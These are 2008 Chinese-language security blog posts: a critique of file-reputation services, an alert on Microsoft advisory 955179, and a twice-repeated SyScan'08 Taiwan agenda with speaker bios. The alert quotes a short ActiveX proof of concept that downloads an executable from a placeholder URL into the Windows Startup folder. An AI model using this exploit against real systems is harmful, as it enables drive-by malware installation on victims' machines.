星期四 10 七月 2008 @ 6:26 上午
前幾天看到一則新聞, 由於搞 SySCAN, 沒有仔細看內容. 剛剛看完, 現在來 po 感想, 新聞 - 不只網頁郵件有黑名單 趨勢將推檔案的信譽評等服務
檔案信譽評等服務, 並不是新東西, 遙想 2002 年左右, 也剛好是某家公司的工程師自己跑出來創業, 就是做類似的技術,不過做沒多久就收掉了 
1. 沒記錯的話, 當時的東西是對執行檔製作 Hash-like 黑白名單, 來判斷執行檔是否可以被執行, 灰色地帶由使用者決定; 某公司想做的看來則是不限執行檔, 不然 “Embedded Script Attacks” 不就是講假的? (題外話, 怎麼會在 SySCAN 上面講基本的 shellcode 寫法 …. 真的是講假的, 讓人很 Orz )
2. 這東西在當時難做的是, 該公司試圖自行為知名軟體製作 Hash-like 白名單, 可是光是 OS 的各語系各版本, Hotfix, Patch, 第三方軟體的更新異動, 試想想 Vista UAC 過了這麼久才出, 還是一堆使用者在幹橋, 每次遇到未知檔案 就要 確認 確認 確認 ….. 差異是 Vista UAC 是權限設計, 而檔案信譽評等是依照對檔案的信任程度來控管.
時光就這樣過了五年, 在雲裡面做各種事情蔚為風行, 某公司趕上趨勢(不要看暈了 XD), 先後對E-Mail/Domain/URL 用了一堆砸錢生出來的機器作為 Service, 不知道為什麼又想到了要把 File 當成新的標的 …
而我的唱衰, 目前有兩個理由:
1. 未知檔案只會越來越多, Exploit file 要具備 Mutation 能力, 每次都不重複, 完全不是問題; 而且 Exploit Generator 過去是 Native 和 Server-side 都有, 如果 檔案信譽評等 搞起來的話, 那麼我認為 Server-side 的 Exploit Generator 將會逐降變為主流, 這樣就可以自動產生變形檔案; 而且像 GAE 那樣免費又提供 Python 程式化能力的 Hosting, 實在很容易惡意使用… 我對某公司對於這種在三界五行之外未知檔案(既不是白名單也不是黑名單)打算怎麼搞, 挺感興趣的:P
某公司以為靠著運算雲就可以快速收集檔案清單? 不過不是沒有好處啦, 最起碼在某個檔案加入黑名單後, 所有的 Agent 可以知道原本有哪個惡意檔案曾經放行過, 至少讓使用者有個警示, 並做損害評估!
2. 如果是對”整個檔案”做 Hash-like 的處理, 我曾經寫過一篇文章 - 一個讓Vista for x64載入惡意驅動程式的”可能”想法, 看不懂的讀者可以直接參考原網站 - Software Integrity Checksums and Code Signing; 每次都有人跟我說, 那就不要用 MD5, 改用 SHA-256 就好, 反正這個手法只是個PoC …
這個手法真的只是 PoC 嗎? 其實不管挑多麼安全的 Hash-like 演算法, 就算是 HIPEMD-160, SHA-512, Whirlpool, 都還是有機會受到上述的攻擊, 此話怎講? 事實上我的論點早在讀書會和IRC上面就說明過了, 像是米國NSA那樣的專業機構, 很可能手上就握有各種 Hash-like 的 collision table, 而且這種產生的成本, 只要產生的結果不重複, 那麼就像 rainbow table 的產生, 只是一次性成本. 就算改用自行變化過的Hash, 還是會被對方的運算雲產生出相對的 collision table.
嘿嘿, 所以我才說是 “當雲端遇上雲端”
事實上, 我會認為要用像是鑑識的做法才是好的解法.
也許某公司會說, 當然不和特定機構比, 但是怎麼能保證網路犯罪者沒有偷偷產生這些 table 呢? 肉雞 越來越便宜阿 ….
歡迎討論 by Kuon
星期三 9 七月 2008 @ 1:11 上午
今天結束了Syscan 2008, 感謝各位大大捧場!
回到家一上網, 好幾位黑人都在討論這個exploit
大家要做好準備了
Microsoft Security Advisory (955179)
Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
Published: July 7, 2008
http://www.microsoft.com/technet/security/advisory/955179.mspx
網路上已經流傳這段Poc,看起來easy to use…Orz
classid=’clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id=’obj’
var buf1 = ‘http://127.0.0.1/a.exe’;
var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe’;
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
Birdman
[另外預告,X-Solve Blog準備轉換到google上了]
星期六 21 六月 2008 @ 11:53 上午
更新版
(詳見 blog: http://syscantaiwan.blogspot.com/)
  |
  |
|
SyScan (Symposium on Security for Asia Network )今年已經第五屆,將首次在台灣舉辦,除了造福國內的資安從業人員之外,也表示台灣的資訊安全研究能量與社群(community)已經逐漸成熟。
SyScan’08 Taiwan 有別於其他的資安研討會,以適合亞洲資安之需求為會議主軸,同時提出領先其他研討會的趨勢性、技術性的議題,邀請在各資安領域研究上有特殊成就者及知名度的強力講師群,帶給台灣資安社群前瞻的國際觀與研究熱情。雖然許多講師為外籍講師,將用英文授課,但我們會同時投影中英文投影,絕對不怕聽不懂。
各路英雄將齊聚台灣,但台灣更是臥虎藏龍,各位英雄好漢,我們7月7~8日不見不散!
|
| |
( 2008/07/07 ) - Day
1 第一天 (詳細內容至:http://syscantaiwan.blogspot.com/) |
|
Time
|
Topic
|
Speaker
|
|
9:30~09:45
|
Opening and Welcome
Address (中)
開場
|
Thomas
Lim
Organiser of SyScan
COSEINC
|
|
9:45~10:15
|
Keynote: Asia’s Significance
in Worldwide Infosec Landscape(中)
亞洲在全球資訊安全之特殊地位 |
Wayne Huang
Armorize (阿碼科技) |
|
10:15~11:15
|
Windows Mobile Rootkit
- Updated (英)
最新Windows Mobile 與行動裝置之 rootkit |
Petr Matousek
COSEINC
|
|
11:15~12:15
|
Hacking RFiD Devices
(英)
如何駭入RFiD設備 |
Adam Laurie
The Bunker |
|
12:15~13:00
|
Lunch Break 午餐休息,請多彼此認識並與講師互動! |
|
13:00~14:00
|
Buffered Code Execution
(英)
Rootkit 執行時期的安全觀測方法: Buffered Code Execution |
Matthew Conover
Symantec (賽門鐵克) |
|
14:00~15:00
|
PhlashDance, fuzzing
your way to expensive bricks(英)
新型攻擊 Permananet Denial of Service (PDOS):利用 flash update
對於嵌入式系統造成永久破壞之攻法
|
Richard Smith
Hewlett-Packard (HP)
|
|
15:00~15:30
|
Coffee
Break 中場點心休息,請多彼此認識並與講師互動! |
|
15:30~16:30
|
Anti Cyber Terrorism
and Critical Information Infrastructure Protection
反恐與國家資訊基礎建設保護(中) |
Jack Yu
Armorize(阿碼科技) |
|
16:30~17:30
|
TBD 稍晚公布(英) |
神秘講師
|
( 2008/07/08 ) - Day
2 第二天(詳細內容至:http://syscantaiwan.blogspot.com/) |
|
Time
|
Topic
|
Speaker
|
|
9:30~10:30
|
Gotcha! Most Effective
Ways to Catch Malware Behaviors on Live Systems
活逮惡意程式之最有效率方法(中) |
Roger Chiu
Malware-Test Lab (大砲開講) |
|
10:30~11:30
|
Enbedded Script Attacks
嵌入式 script 攻擊(中) |
Sean Feng
TrendMicro(趨勢科技)
|
|
11:30~12:30
|
Lunch Break 午餐休息,請多彼此認識並與講師互動! |
|
12:30~13:30
|
Crimeware Forensics
Analysis using Toolmarks(中)
犯罪軟體的鑑識與工具痕分析 |
Birdman
Armorize(阿碼科技) |
|
13:30~14:30
|
The
Powerful Evil on Mobile Phone(中)
手機上的強大邪惡 |
Nanika
COSEINC
|
|
14:30~15:00
|
Coffee
Break 中場點心休息,請多彼此認識並與講師互動! |
|
15:00~16:00
|
Python Makes You
Fly Safely?(中)
了解 Python 的飛行安全 |
Kuon Ding
Armorize(阿碼科技) |
|
16:00~17:00
|
Cooperative Offensive
Computing(英)
協同式攻擊性計算 |
Fyodor
Yarochkin
Guard-Info
|
|
17:30
|
End of SyScan’08 Taiwan |
|

|
|
★ 主辦單位保留變更活動內容及相關事項之權利。
|
|
|
| 部份會議講師: |
|
黃耀文 (Wayne) — Armorize
阿碼科技創辦人兼執行長,國際開放Web軟體安全計畫
(Open Web Application Security Project, OWASP)台灣分會會長。Wayne專攻Web資安領域,發表多篇得獎學術論文,並曾為RSA、WWW、PHP、OWASP
Asia等大型國際會議講師。
Adam Laurie – The Bunker
自1997年起,Adam Laurie即擔任defcon的核心成員至今,他亦從早期即是BlackHat的核心成員、The
Trifinite Group的核心成員以及Apache-SSL模組之開發者。Adam目前也是FIRST的核心成員,並於近幾年專心研究RFID資安問題,為此方面全球第一交椅。Adam去年在BlackHat裡關於RFID安全的演將,讓各界開始關注RFID安全問題。
Matthew Conover — Symantec
外號”shok”,是Symantec Research
Labs之首席工程師,也是w00w00團體的領導者。Matt於1999年,發表了全球第一篇關於Windows
heap overflow之paper,在該領域堪稱全球第一交椅,Matt也曾擔任 RSA、CanSecWest、SANS與XCon研討會講師。
Richard Smith — Hewlett-Packard (HP)
是HP可信任系統研究室成員,主要研究攻擊技術與威脅(Offensive
Technologies & Threats),在系統弱點攻擊(exploitation)、弱點探測與惡意程式發展趨勢,以企業等級的大型環境為基礎的資安發展研究,讓他在電腦之外的網路設備、韌體的安全著墨甚深,並以可信賴運算科技建立資安程序與威脅模型。Rich
Smith在各大型國際資安會議中皆曾擔任講師,包括BlackHat、defcon、EUSecWest等會議。
Petr Matousek — COSEINC
曾經是29A病毒研究組織成員,現任COSEINC的惡意程式前瞻研究室(Advanced
Malware Lab)成員,專注於 Windows Mobile 平台與各式行動裝置上惡意程式與研究,已經成功發表行動裝置上的rootkits
與攻擊手法研究。
Fyodor Yarochki — Guard-Info
Fyodor經常擔任各國際駭客年會之講師,包含BlackHat
2001 HK、BlackHat 2001 Singapore、BlackHat 2002、Ruxcon 2003、XCon
2003 / 2006、HITB 2004 / 2005、SyScan 2005、Bellua 2005、以及VNSecurity
2007。他於頂尖資安學術會議與地下雜誌皆有重要文章發表,包含Usenix Conference與Phrack
Magazine(最具影響力之地下駭客雜誌)。Fyodor並為Snort最早的開發者之一,目前仍為Snort
FAQ的維護者。Fyodor並為XProbe的創辦人。
|
|
邱春樹 (Roger、”大砲”) — Malware-Test
Lab
現任Malware-Test Lab負責人,知名Blog「大砲開講」網站版主。Roger先前於趨勢科技防毒引擎研發部門工作七年,離開後隨即創辦
Malware-Test Lab,長期與各領域資安工作者分享自己在防毒、反間諜軟體領域的經驗,對惡意程式與網站安全有深厚研究。
馮祥安(Sean Feng) — TrendMicro
是趨勢科技Core Tech Threat Solution
Team中之資深工程師,專注於研究病毒偵測與加解殼技術。在工作上長期參與惡意程式之反組譯專案–他的工作內容是研究最新的惡意程式攻擊方法,並研發偵測與防制之技術。
Nanika — COSEINC
Nanika現任COSEINC的弱點研究實驗室(Vulnerability
Research Lab)成員,專注於Windows平台弱點模糊暴力式探測,已經發表大量的Windows平台弱點。
邱銘彰 (aka “Birdman”) — Armorize
阿碼科技X-Solve實驗室首席研究員。Birdman利用其所研發之Archon與HackAlert技術,長期監控亞洲所有網站被掛馬之情況,專長各種惡意程式分析,日中一食,堪稱是節能環保省碳型多才多藝的後現代資安人才。
余俊賢 (Jack) — Armorize
現任阿碼科技資安顧問與講師,曾擔任資安人雜誌主編。Jack對於亞洲之特殊攻擊型態,長期投入研究,專長為資安事件處理與電腦鑑識
,擁有CISSP、 BS 7799 LA、CEH 等資安證照。
Kuon Ding — Armorize
現任阿碼科技資安顧問與講師,曾接受商業週刊專訪、資安人雜誌投稿與擔任資安研討會講師,專長為Windows
System Programming、 Windows Kernel & Windows Internal、Computer
Forensic & Anti-Forensic、 Web Auditing & Penetrating與
Software Reversing。
|
| 部份會議內容: |
Asia’s
Significance in Worldwide InfoSec Landscape –
Wayne Huang, Armorize
亞洲在全球資訊安全之特殊地位 (中文) |
|
SyScan到今年第五屆了,歷屆吸引了世界最頂尖的資安講師,飛到新加坡演講,今年也特地在台北舉辦。在亞洲舉辦的各大國際資安會議,例如台北的OWASP
Asia,新加坡的Syscan,日本的BlackHat Japan與PacSec,中國的XCon,馬來西亞的HITB,越南的VNSECon,各個都辦得有聲有色,品質直追美國BlackHat/defcon。
這不是沒有原因,此演講將探討亞洲在全球資安領域所扮演的重要角色。
在資安研究從興趣演進成商機,用從商業運用邁入軍事運用的今天,亞洲實為全球資安戰之最激烈戰場。 這對亞洲之資安實力之累積,意義為何?亞洲資安工作者,又如何在此激烈戰局中,有效運用局勢,不但自保,更能幫公司與自己之資安生涯,搶佔上風?
|
Buffered
Code Execution — Matthew Conover, Symantec
Rootkit 執行時期的安全觀測方法: Buffered Code Execution (英文) |
本演講將講解最近在Symantec Research Labs研發出的一個雛形系統,可以把kernel-mode的驅動程式在user-mode下執行。本技術主要用來在user-mode下觀察kernel-mode之
rootkit 的行為,並能有效控制其行為。有別於傳統利用模擬器之作法,本技術是直接將 rootkit 利用真實硬體執行起來,但是是在
ring 3 而非 ring 0。當此 rootkit 開始利用特殊指令,或開始讀取 / 修改 / 執行 kernel-mode
之記憶體時,我們將 faults 攔截下來並送入 kernel 內。這樣一方面可以使此 rootkit 得以正常執行,一方面又得將其行為限制於sandbox內。本演講將深入探討此技術與實做,也將實際展示此雛形系統。
|
Hacking
RFiD Devices — Adam Laurie, The Bunker
如何駭入RFiD設備 (英文) |
RFID晶片的使用目前已經非常普及,從護照到褲子,從鑰匙到信用卡到手機到垃圾桶到寵物到甚至人體。不知為何,似乎RFID晶片非常好用,可以解決各種問題,怎麼裝都不嫌多!
這個演講將探討RFID的底層技術,商業運用與運作方式,以及為何會產生資安漏洞,並將詳細地示範許多軟體以及硬體的攻擊工具(exploits)。
|
Windows
Mobile Rootkit — Updated — Petr Matousek, COSEINC
最新Windows Mobile 與行動裝置之 rootkit (英文) |
|
這個演講將公開許多能攻陷Windows Embedded CE 6 核心並隱藏
rootkit 的方法。我們將先比較 Windows Embedded CE 6 核心與 Windows CE
5 核心在架構與實做上之差異,並著眼於記憶體管理、程序管理、系統呼叫之處理、以及資安防護之機制。
接下來我們將講述如何在Windows
CE 6核心環境下,隱藏程序,檔案,以及registry keys,主要以 direct kernel object
manipulations以及 hooking of handle- and non-handle-based
syscalls手法為主,但不僅限於利用apiset來達成,我們還將介紹之前外界不知道的手法。
在防禦方面,我們將介紹如何在手機與行動裝置上偵測出此類的
rootkit。我們將展示具備完整功能的 rootkit(攻擊),以及偵測與監控之工具(防禦)。
|
PhlashDance,
fuzzing your way to expensive bricks — Richard Smith, HP
新型攻擊 — PDOS:利用 flash update 對於嵌入式系統造成永久破壞之攻法 (英文)
|
|
此演講介紹一種新種類的攻擊:「永久性DOS
–(Permanent Denial Of Service (PDOS)」,主要針對嵌入式系統之設備。我們將介紹一種號稱為「Phlash」之PDOS攻擊手法,主要利用韌體之
flash update 機制,達成PDOS之目的。我們將針對各嵌入式系統之 flash update 機制與韌體本身的結構做深入的分析,並介紹一個通用的模糊暴力式探測平台(generic
fuzzing framework)– PhlashDance。PhlashDance能自動在各式各樣不同的嵌入式系統中找出PDOS漏洞。
除了介紹這些技術細節以外,我們也將解釋,為何這種新型攻擊必須受到各廠商(IT,手機與行動裝置)之關心,以及避免此種攻擊之種種困難處。
|
Gotcha!
Most Effective Ways to Catch Malware Behaviors on Live Systems
— 邱春樹 (Roger / 大砲開講),
Malware-Test Lab
活逮惡意程式之最有效率方法 (中文) |
當防毒軟體偵測率越來越低的情況下,使用者電腦中毒比率日益增加且無法察覺,導致重要資料被攻擊者竊取,而造成財物上的損失。此演講希望透過一些既有的工具,提供一種快速找出可疑惡意程式的方法。
|
Anti
Cyber Terrorism and Critical Information Infrastructure
Protection — Jack Yu, Armorize
反恐與國家資訊基礎建設保護(中文) |
實體國土中的人、金錢、物品與疾病進出可管制,但是面對高度網路化的資訊服務所延伸的資訊國土該如何防護?本議題將從資訊基礎建設保護來談,面對大規模網路攻擊、經濟目的或針對性攻擊相關的資訊恐怖攻擊的警訊分析,以及建構防制資訊災害應變系統的探討。
|
Crimeware
Forensics Analysis using Toolmark — 邱銘彰 (Birdman), Armorize
犯罪軟體的鑑識與工具痕分析 (中文) |
犯罪軟體(Crimeware)是指有犯罪意圖的惡意程式。近年來駭客的活動,不但越來越具規模而且更加地組織化,導致大量的個人資料外洩,也造成駭客間的地下經濟蓬勃發展。這個場次中,我們將以惡意程式鑑識角度(Malware
Forensics)分析駭客所使用的攻擊工具與後門,透過工具痕衡以了解作者的來源、意圖目的與威脅衝擊,藉此區分類出不同駭客的活動,並加以追蹤。
|
The
Powerful Evil on Mobile Phone — Nanika, COSEINC
手機上的強大邪惡 (中文) |
|
目前大多數智慧型手機還是以WinCE平台為主,並且大多數使用者並不在意安全性,或認為手機上會有漏洞或病毒。這次討論將會以最常見的Windows
Mobile 5以及Windows Mobile 6系統為主,深入探討在這個平台上需要注意哪些風險。本演講將讓大家對於手機的安全徹底改觀,開始先介紹Windows
CE核心結構後,立即詳述後門有哪些強大的功能,以及弱點在利用上有哪些技巧,如何在WinCE上發現弱點,以及何有效隱藏
rootkit等超強技術。
|
Python
Makes You Fly Safely? — Kuon, Armorize
了解 Python 的飛行安全 |
|
Python 已經在 TIOBE 程式語言調查結果中,位於前十名且不斷爬升;Google App Engine(應用程式代管服務)最先支援的程式語言就是
Python。Python 近年來大放異彩,多數應用面的安全基礎卻未見其發芽,希望藉由探討 Python Internals
來為 Python 安全研究播下種子。
|
Cooperative
offensive computing — Fyodor, Guard-Info
協同式攻擊性計算 |
|
分散式攻擊性系統(offensive
distributed systems)自1998年後就已經是地下駭客組織研究的重點。此演講將詳述可以用來組織此類系統之工具以及使用之手法。系統之骨幹為無法被監聽之傳出協定,每一個端點則負責執行一個單一任務,並將結果回報給協同系統。我們將介紹前一代系統如:Yawatt、STIF、pbounce等,並於會場首次公開由
Fydor 與 Meder 所開發之第三代協同式攻擊性計算系統。
|
Embedded
Script Attacks — Sean, TrendMicro
嵌入式 script 攻擊(中文) |
|
Script語言一直被認為只有在Web上被運用,但是實際上,在今天,許許多多的應用中都會使用嵌入式scripts(embedded
scripts),而我們也觀察到,惡意程式的製造者越來越懂得利用嵌入式script來達成攻擊。在這個演講中,我們會帶大家了解目前許多含有嵌入式script之檔案格式,這些格式如何導致隱藏之惡意script,以及偵測此種攻擊之不同技術。
|
大會場地與交通資訊
|
|
本次大會於舒適寬敞之劇院型階梯演講聽 –「台大醫院國際會議中心401室」舉辦,地址為:100台北市中正區徐州路2號。交通資訊請見:
http://www.thcc.net.tw/othstraffic.html

|
報名資訊
|
|
報名類別
|
個人
|
團體報名 (相同公司5人或5人以上)
|
學生(28歲以下)
|
|
註冊日期:六月
|
$1,500
|
$1,200 每人
|
$1,000
|
|
註冊日期:七月
|
$2,000
|
$1,600 每人
|
$1,200
|
|
現場報名
|
$2,500
|
恕不接受現場團報
|
$1,500
|
1. 活動Blog(有詳細最新資訊):http://syscantaiwan.blogspot.com
2. 大會官方網頁:http://www.syscan.org/tw/indextw.html
3. 網路報名請至:http://www.syscan.org/tw/reg_conference.html
2. 如不信任網站安全,可利用填寫報名表傳真至2-6616-1100,並電話確認,報名表如下:
姓名:
電話(手機佳):
公司:
Email:
學生:
T-shirt size:S / M / L / XL / XXL
素食:
3. 如有問題請來電或來信詢問。電:02-6616-0100
#111 林先生,email: jason.lin@armorize.com
|
|
|
Copyright.
Armorize Technologies, Inc. 2008.

|
星期一 16 六月 2008 @ 10:40 上午
打個廣告,暑假是駭客活動的高峰期! 研討會大家別忘記了
ccc
  |
  |
|
SyScan (Symposium on Security for Asia Network )今年已經第五屆,將首次在台灣舉辦,除了造福國內的資安從業人員之外,也表示台灣的資訊安全研究能量與社群(community)已經逐漸成熟。
SyScan’08 Taiwan 有別於其他的資安研討會,以適合亞洲資安之需求為會議主軸,同時提出領先其他研討會的趨勢性、技術性的議題,邀請在各資安領域研究上有特殊成就者及知名度的強力講師群,帶給台灣資安社群前瞻的國際觀與研究熱情。雖然許多講師為外籍講師,將用英文授課,但我們會同時投影中英文投影,絕對不怕聽不懂。
各路英雄將齊聚台灣,但台灣更是臥虎藏龍,各位英雄好漢,我們7月7~8日不見不散!
|
| |
( 2008/07/07 ) - Day
1 第一天 (詳細內容至:http://www.syscan.org/tw/indextw.html) |
|
Time
|
Topic
|
Speaker
|
|
9:30~09:45
|
Opening and Welcome
Address (中)
開場
|
Thomas
Lim
Organiser of SyScan
COSEINC
|
|
9:45~10:15
|
Keynote: Asia’s Significance
in Worldwide Infosec Landscape(中)
亞洲在全球資訊安全之特殊地位 |
Wayne Huang
Armorize (阿碼科技) |
|
10:15~11:15
|
Windows Mobile Rootkit
- Updated (英)
最新Windows Mobile 與行動裝置之 rootkit |
Petr Matousek
COSEINC
|
|
11:15~12:15
|
Hacking RFiD Devices
(英)
如何駭入RFiD設備 |
Adam Laurie
The Bunker |
|
12:15~13:00
|
Lunch Break 午餐休息,請多彼此認識並與講師互動! |
|
13:00~14:00
|
Buffered Code Execution
(英)
Rootkit 執行時期的安全觀測方法: Buffered Code Execution |
Matthew Conover
Symantec (賽門鐵克) |
|
14:00~15:00
|
PhlashDance, fuzzing
your way to expensive bricks(英)
新型攻擊 Permananet Denial of Service (PDOS):利用 flash update
對於嵌入式系統造成永久破壞之攻法
|
Richard Smith
Hewlett-Packard (HP)
|
|
15:00~15:30
|
Coffee
Break 中場點心休息,請多彼此認識並與講師互動! |
|
15:30~16:30
|
Anti Cyber Terrorism
and Critical Information Infrastructure Protection
反恐與國家資訊基礎建設保護(中) |
Jack Yu
Armorize(阿碼科技) |
|
16:30~17:30
|
TBD 稍晚公布(英) |
神秘講師
|
( 2008/07/08 ) - Day
2 第二天(詳細內容至:http://www.syscan.org/tw/indextw.html) |
|
Time
|
Topic
|
Speaker
|
|
9:30~10:30
|
Gotcha! Most Effective
Ways to Catch Malware Behaviors on Live Systems
活逮惡意程式之最有效率方法(中) |
Roger Chiu
Malware-Test Lab (大砲開講) |
|
10:30~11:30
|
Enbedded Script Attacks
嵌入式 script 攻擊(中) |
Sean Feng
TrendMicro(趨勢科技)
|
|
11:30~12:30
|
Lunch Break 午餐休息,請多彼此認識並與講師互動! |
|
12:30~13:30
|
Crimeware Forensics
Analysis using Toolmarks(中)
犯罪軟體的鑑識與工具痕分析 |
Birdman
Armorize(阿碼科技) |
|
13:30~14:30
|
The
Powerful Evil on Mobile Phone(中)
手機上的強大邪惡 |
Nanika
COSEINC
|
|
14:30~15:00
|
Coffee
Break 中場點心休息,請多彼此認識並與講師互動! |
|
15:00~16:00
|
Python Makes You
Fly Safely?(中)
了解 Python 的飛行安全 |
Kuon Ding
Armorize(阿碼科技) |
|
16:00~17:00
|
Cooperative Offensive
Computing(英)
協同式攻擊性計算 |
Fyodor
Yarochkin
Guard-Info
|
|
17:30
|
End of SyScan’08 Taiwan |
|

|
|
★ 主辦單位保留變更活動內容及相關事項之權利。
|
|
|
| 部份會議講師: |
|
黃耀文 (Wayne) — Armorize
阿碼科技創辦人兼執行長,國際開放Web軟體安全計畫
(Open Web Application Security Project, OWASP)台灣分會會長。Wayne專攻Web資安領域,發表多篇得獎學術論文,並曾為RSA、WWW、PHP、OWASP
Asia等大型國際會議講師。
Adam Laurie – The Bunker
自1997年起,Adam Laurie即擔任defcon的核心成員至今,他亦從早期即是BlackHat的核心成員、The
Trifinite Group的核心成員以及Apache-SSL模組之開發者。Adam目前也是FIRST的核心成員,並於近幾年專心研究RFID資安問題,為此方面全球第一交椅。Adam去年在BlackHat裡關於RFID安全的演將,讓各界開始關注RFID安全問題。
Matthew Conover — Symantec
外號”shok”,是Symantec Research
Labs之首席工程師,也是w00w00團體的領導者。Matt於1999年,發表了全球第一篇關於Windows
heap overflow之paper,在該領域堪稱全球第一交椅,Matt也曾擔任 RSA、CanSecWest、SANS與XCon研討會講師。
Richard Smith — Hewlett-Packard (HP)
是HP可信任系統研究室成員,主要研究攻擊技術與威脅(Offensive
Technologies & Threats),在系統弱點攻擊(exploitation)、弱點探測與惡意程式發展趨勢,以企業等級的大型環境為基礎的資安發展研究,讓他在電腦之外的網路設備、韌體的安全著墨甚深,並以可信賴運算科技建立資安程序與威脅模型。Rich
Smith在各大型國際資安會議中皆曾擔任講師,包括BlackHat、defcon、EUSecWest等會議。
Petr Matousek — COSEINC
曾經是29A病毒研究組織成員,現任COSEINC的惡意程式前瞻研究室(Advanced
Malware Lab)成員,專注於 Windows Mobile 平台與各式行動裝置上惡意程式與研究,已經成功發表行動裝置上的rootkits
與攻擊手法研究。
Fyodor Yarochki — Guard-Info
Fyodor經常擔任各國際駭客年會之講師,包含BlackHat
2001 HK、BlackHat 2001 Singapore、BlackHat 2002、Ruxcon 2003、XCon
2003 / 2006、HITB 2004 / 2005、SyScan 2005、Bellua 2005、以及VNSecurity
2007。他於頂尖資安學術會議與地下雜誌皆有重要文章發表,包含Usenix Conference與Phrack
Magazine(最具影響力之地下駭客雜誌)。Fyodor並為Snort最早的開發者之一,目前仍為Snort
FAQ的維護者。Fyodor並為XProbe的創辦人。
|
|
邱春樹 (Roger、”大砲”) — Malware-Test
Lab
現任Malware-Test Lab負責人,知名Blog「大砲開講」網站版主。Roger先前於趨勢科技防毒引擎研發部門工作七年,離開後隨即創辦
Malware-Test Lab,長期與各領域資安工作者分享自己在防毒、反間諜軟體領域的經驗,對惡意程式與網站安全有深厚研究。
馮祥安(Sean Feng) — TrendMicro
是趨勢科技Core Tech Threat Solution
Team中之資深工程師,專注於研究病毒偵測與加解殼技術。在工作上長期參與惡意程式之反組譯專案–他的工作內容是研究最新的惡意程式攻擊方法,並研發偵測與防制之技術。
Nanika — COSEINC
Nanika現任COSEINC的弱點研究實驗室(Vulnerability
Research Lab)成員,專注於Windows平台弱點模糊暴力式探測,已經發表大量的Windows平台弱點。
邱銘彰 (aka “Birdman”) — Armorize
阿碼科技X-Solve實驗室首席研究員。Birdman利用其所研發之Archon與HackAlert技術,長期監控亞洲所有網站被掛馬之情況,專長各種惡意程式分析,日中一食,堪稱是節能環保省碳型多才多藝的後現代資安人才。
余俊賢 (Jack) — Armorize
現任阿碼科技資安顧問與講師,曾擔任資安人雜誌主編。Jack對於亞洲之特殊攻擊型態,長期投入研究,專長為資安事件處理與電腦鑑識
,擁有CISSP、 BS 7799 LA、CEH 等資安證照。
Kuon Ding — Armorize
現任阿碼科技資安顧問與講師,曾接受商業週刊專訪、資安人雜誌投稿與擔任資安研討會講師,專長為Windows
System Programming、 Windows Kernel & Windows Internal、Computer
Forensic & Anti-Forensic、 Web Auditing & Penetrating與
Software Reversing。
|
| 部份會議內容: |
Asia’s
Significance in Worldwide InfoSec Landscape –
Wayne Huang, Armorize
亞洲在全球資訊安全之特殊地位 (中文) |
|
SyScan到今天第五屆了,歷屆吸引了世界最頂尖的資安講師,飛到新加坡演講,今年也特地在台北舉辦。在亞洲舉辦的各大國際資安會議,例如台北的OWASP
Asia,新加坡的Syscan,日本的BlackHat Japan與PacSec,馬來西亞的HITB,越南的VNSECon,各個都辦得有聲有色,品質直追美國BlackHat/defcon。
這不是沒有原因,此演講將探討亞洲在全球資安領域所扮演的重要角色。
在資安研究從興趣演進成商機,用從商業運用邁入軍事運用的今天,亞洲實為全球資安戰之最激烈戰場。 這對亞洲之資安實力之累積,意義為何?亞洲資安工作者,又如何在此激烈戰局中,有效運用局勢,不但自保,更能幫公司與自己之資安生涯,搶佔上風?
|
Buffered
Code Execution — Matthew Conover, Symantec
Rootkit 執行時期的安全觀測方法: Buffered Code Execution (英文) |
本演講將講解最近在Symantec Research Labs研發出的一個雛形系統,可以把kernel-mode的驅動程式在user-mode下執行。本技術主要用來在user-mode下觀察kernel-mode之
rootkit 的行為,並能有效控制其行為。有別於傳統利用模擬器之作法,本技術是直接將 rootkit 利用真實硬體執行起來,但是是在
ring 3 而非 ring 0。當此 rootkit 開始利用特殊指令,或開始讀取 / 修改 / 執行 kernel-mode
之記憶體時,我們將 faults 攔截下來並送入 kernel 內。這樣一方面可以使此 rootkit 得以正常執行,一方面又得將其行為限制於sandbox內。本演講將深入探討此技術與實做,也將實際展示此雛形系統。
|
Hacking
RFiD Devices — Adam Laurie, The Bunker
如何駭入RFiD設備 (英文) |
RFID晶片的使用目前已經非常普及,從護照到褲子,從鑰匙到信用卡到手機到垃圾桶到寵物到甚至人體。不知為何,似乎RFID晶片非常好用,可以解決各種問題,怎麼裝都不嫌多!
這個演講將探討RFID的底層技術,商業運用與運作方式,以及為何會產生資安漏洞,並將詳細地示範許多軟體以及硬體的攻擊工具(exploits)。
|
Windows
Mobile Rootkit — Updated — Petr Matousek, COSEINC
最新Windows Mobile 與行動裝置之 rootkit (英文) |
|
這個演講將公開許多能攻陷Windows Embedded CE 6 核心並隱藏
rootkit 的方法。我們將先比較 Windows Embedded CE 6 核心與 Windows CE
5 核心在架構與實做上之差異,並著眼於記憶體管理、程序管理、系統呼叫之處理、以及資安防護之機制。
接下來我們將講述如何在Windows
CE 6核心環境下,隱藏程序,檔案,以及registry keys,主要以 direct kernel object
manipulations以及 hooking of handle- and non-handle-based
syscalls手法為主,但不僅限於利用apiset來達成,我們還將介紹之前外界不知道的手法。
在防禦方面,我們將介紹如何在手機與行動裝置上偵測出此類的
rootkit。我們將展示具備完整功能的 rootkit(攻擊),以及偵測與監控之工具(防禦)。
|
PhlashDance,
fuzzing your way to expensive bricks — Richard Smith, HP
新型攻擊 — PDOS:利用 flash update 對於嵌入式系統造成永久破壞之攻法 (英文)
|
|
此演講介紹一種新種類的攻擊:「永久性DOS
–(Permanent Denial Of Service (PDOS)」,主要針對嵌入式系統之設備。我們將介紹一種號稱為「Phlash」之PDOS攻擊手法,主要利用韌體之
flash update 機制,達成PDOS之目的。我們將針對各嵌入式系統之 flash update 機制與韌體本身的結構做深入的分析,並介紹一個通用的模糊暴力式探測平台(generic
fuzzing framework)– PhlashDance。PhlashDance能自動在各式各樣不同的嵌入式系統中找出PDOS漏洞。
除了介紹這些技術細節以外,我們也將解釋,為何這種新型攻擊必須受到各廠商(IT,手機與行動裝置)之關心,以及避免此種攻擊之種種困難處。
|
Gotcha!
Most Effective Ways to Catch Malware Behaviors on Live Systems
— 邱春樹 (Roger / 大砲開講),
Malware-Test Lab
活逮惡意程式之最有效率方法 (中文) |
